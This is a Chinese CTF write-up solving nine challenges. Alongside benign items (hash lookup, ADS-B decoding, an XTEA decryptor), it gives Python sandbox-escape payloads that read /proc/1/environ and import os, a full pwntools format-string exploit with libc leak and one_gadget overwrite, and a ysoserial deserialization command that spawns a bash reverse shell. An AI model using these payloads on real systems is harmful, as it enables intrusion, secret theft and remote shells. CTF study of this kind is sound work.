一.SpeedUp
在这个网站直接记载了2的27次方的阶乘的每一位数字之和
对4495662081取个sha256即可
flag{bbdee5c548fddfc76617c562952a3a3b03d423985c095521a8661d248fad3797}
二.谍影重重2.0
将数据包导出为json格式
使用脚本提取字段并计算 MD5
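import hashlib
import json

import pyModeS as pms

# Path of the Wireshark/tshark JSON export of the capture.
CAPTURE_FILE = '123.json'
# Hex characters skipped at the start of every TCP payload before the Mode S
# message; the original slice was i[18:], i.e. 9 bytes of framing —
# NOTE(review): confirm against the capture.
MSG_OFFSET = 18
# A Mode S extended squitter is 112 bits = 28 hex characters.
MODE_S_HEX_LEN = 28


def _tcp_payloads(packets):
    """Return the hex TCP payloads found in *packets* (a tshark JSON export).

    Packets without a ``_source``/``layers``/``tcp`` structure, or whose TCP
    layer has no ``tcp.payload``, are skipped.  The ``:`` byte separators that
    tshark inserts are stripped so the result is plain hex.
    """
    payloads = []
    for packet in packets:
        layers = packet.get('_source', {}).get('layers', {})
        tcp_layer = layers.get('tcp')
        if tcp_layer and 'tcp.payload' in tcp_layer:
            payloads.append(tcp_layer['tcp.payload'].replace(':', ''))
    return payloads


def _velocity_records(payloads, msg_offset=MSG_OFFSET):
    """Decode ADS-B velocity data from the hex *payloads*.

    Args:
        payloads: hex strings, each carrying a Mode S message after
            *msg_offset* hex characters of framing.
        msg_offset: number of leading hex characters to skip.

    Returns:
        A list of ``{'icao', 'speed', 'track', 'vertical_rate'}`` dicts, one
        per message whose type code is 19..22 and that pyModeS could decode.
    """
    planes = []
    for payload in payloads:
        msg = payload[msg_offset:]
        # Too-short payloads make pyModeS raise on an empty/partial hex
        # string; the original script crashed on these.
        if len(msg) < MODE_S_HEX_LEN:
            continue
        # typecode() is None for downlink formats other than 17/18; the
        # original compared it directly (`None >= 19` -> TypeError).
        type_code = pms.adsb.typecode(msg)
        if type_code is None or not 19 <= type_code <= 22:
            continue
        # velocity() returns None when the message carries no decodable
        # velocity, which the original unpacking did not tolerate.
        velocity = pms.adsb.velocity(msg)
        if velocity is None:
            continue
        speed, track, vertical_rate, _ = velocity
        if speed is None:
            continue
        planes.append({
            'icao': pms.adsb.icao(msg),
            'speed': speed,
            'track': track,
            'vertical_rate': vertical_rate,
        })
    return planes


def _fastest_icao_md5(planes):
    """Return the MD5 hex digest of the upper-cased ICAO address of the fastest plane.

    Raises:
        ValueError: if *planes* is empty (the original ``max()`` raised a
            less helpful ValueError in that case).
    """
    if not planes:
        raise ValueError('no ADS-B velocity messages were decoded')
    fastest_plane = max(planes, key=lambda plane: plane['speed'])
    return hashlib.md5(fastest_plane['icao'].upper().encode()).hexdigest()


def main():
    """Read the capture, decode the velocity messages and print the answer hash."""
    with open(CAPTURE_FILE, 'r', encoding='utf-8') as file:
        data = json.load(file)
    planes = _velocity_records(_tcp_payloads(data))
    print(_fastest_icao_md5(planes))


if __name__ == '__main__':
    main()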
请无视报错，我的 PyCharm 环境有点问题
三.Pyjail ! It's myFILTER !!!
使用nc连接,发现有很多代码
审计代码后发现漏洞：可以非预期地读取环境变量
使用payload
{print(open("/proc/1/environ").read())}
四.Ez_fmt
脚本如下
# Solve script for the "Ez_fmt" pwn challenge (pwntools).  Every constant
# below (format-string argument indices, padding lengths, the +243 and
# 0xe3b01 libc offsets) is specific to the challenge binary and its
# libc-2.31.so and will not carry over to another build.
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
#p = process('./ez_fmt')
# Placeholders: 'ip' and `port` must be filled in (`port` is not defined here).
p = remote('ip', port)
elf = ELF('./ez_fmt')
libc = ELF('./libc-2.31.so')
# First leak: the service prints a "0x"-prefixed address; 12 hex digits are
# read back.  NOTE(review): newer pwntools expects bytes here (b"0x"); str
# still works but warns.
p.recvuntil("0x")
stack=int(p.recv(12),16)
print(hex(stack))
# First payload: format string padded to 0x28 bytes, followed by the
# 8-byte address stack-8.
pay=b'%4589c%11$hn%19$p'.ljust(0x28,b'\x00')+p64(stack-8)
p.send(pay)
# Second leak: the libc base is derived from the leaked pointer; 243 is
# its distance from __libc_start_main in this libc build.
p.recvuntil("0x")
libc_base=int(p.recv(12),16)-libc.sym['__libc_start_main']-243
print(hex(libc_base))
# one_gadget offset taken from the challenge's libc-2.31.so.
one_gadget=libc_base+0xe3b01
p.recvuntil("\n")
# Second payload: one_gadget written as two 16-bit halves (%hn) at
# stack+0x68 and stack+0x68+2, the addresses appended after 0x20 bytes of
# padding.
pay=(b'%'+str(one_gadget&0xffff).encode()+b'c%10$hn'+b'%'+str(((one_gadget>>16)&0xffff)-(one_gadget&0xffff)).encode()+b'c%11$hn').ljust(0x20,b'\x00')+p64(stack+0x68)+p64(stack+0x68+2)
p.send(pay)
p.interactive()
五.babyre
发现程序存在 TLS 反调试
#include <stdio.h>
#include <stdint.h>
/*
 * jiemi ("decrypt"): undoes 4*33 rounds of what appears to be an XTEA-style
 * Feistel cipher with modified constants, on the two 32-bit words in v,
 * in place, using the 128-bit key.  delta (0x88408067), the initial sum
 * (0xd192c263) and the 5/4 shift amounts are the values recovered from the
 * challenge binary; the second word additionally XORs sum.
 */
void jiemi(uint32_t v[2], uint32_t const key[4]) {
    const uint32_t delta = 0x88408067;
    uint32_t sum = 0xd192c263;
    uint32_t a = v[0];
    uint32_t b = v[1];
    /* The original i/j counters were never used in the body, so the nested
       4 x 33 loops collapse into a single loop of 132 rounds. */
    unsigned int rounds_left = 4 * 33;
    while (rounds_left-- > 0) {
        sum -= delta;
        b -= (((a << 5) ^ (a >> 4)) + a) ^ (sum + key[(sum >> 11) & 3]);
        a -= (((b << 5) ^ (b >> 4)) + b) ^ (sum + key[sum & 3]) ^ sum;
    }
    v[0] = a;
    v[1] = b;
}
/*
 * Decrypts the four 8-byte blocks of the embedded ciphertext with jiemi()
 * and prints the 32 recovered bytes as characters, little-endian word by
 * word.  No trailing newline is printed, exactly as the original.
 */
int main()
{
    uint32_t array[8] = {0x9523F2E0, 0x8ED8C293, 0x8668C393, 0xDDF250BC, 0x510E4499, 0x8C60BD44, 0x34DCABF2, 0xC10FD260};
    uint32_t key[4] = {0x62, 0x6F, 0x6D, 0x62};   /* the bytes of "bomb" as 32-bit words */
    for (int blk = 0; blk < 8; blk += 2) {
        uint32_t words[2] = {array[blk], array[blk + 1]};
        jiemi(words, key);
        /* emit each decrypted word byte by byte, lowest byte first */
        for (int w = 0; w < 2; w++) {
            for (int shift = 0; shift < 32; shift += 8) {
                putchar((char)(words[w] >> shift));
            }
        }
    }
    return 0;
}
六.Pyjail ! It's myRevenge
使用nc连接,依次进行如下操作
{globals().update(dict(my_filter=lambda x:1))}''{in''put()}'#
{globals().update(dict(len=lambda x:0))}''{in''put()}'#
{print("".__class__.__mro__[1].__subclasses__()[137].__init__.__globals__["__builtins__"]["__import__"]("os").listdir())}
['flag_26F574F8CEE82D06FEDC45CF5916B86A732DD326CE1CB2C9A96751E072D0A104', 'server_8F6C72124774022B.py']{globals().update(dict(my_filter=lambda x:1))}''{in' 'put()}'#
{globals(). update(dict(len=lambda x:0))}''{in' 'put()}'#
{print (open("flag_26F574F8CEE82D06FEDC45CF5916B86A732DD326CE1CB2C9A96751E072D0A104"). read())}
七.石头剪刀布
按照如下顺序即可获胜
0000011220120220110111222010022012110021012012202100112022100112110020110220210201
八.happygame
使用ysoserial-all.jar工具
java -jar ysoserial-all.jar CommonsCollections5 'bash -c {echo,xxxxx}|{base64,-d}|{bash,-i}'|base64
其中 xxxxx 为反弹 shell 命令的 base64 编码
可以使用在线网站生成反弹shell的指令
打开postman,使用grpc协议,填写ip,端口,选择ProcessMsg接口
invoke之后即可反弹shell
九.调查问卷
不用多说了吧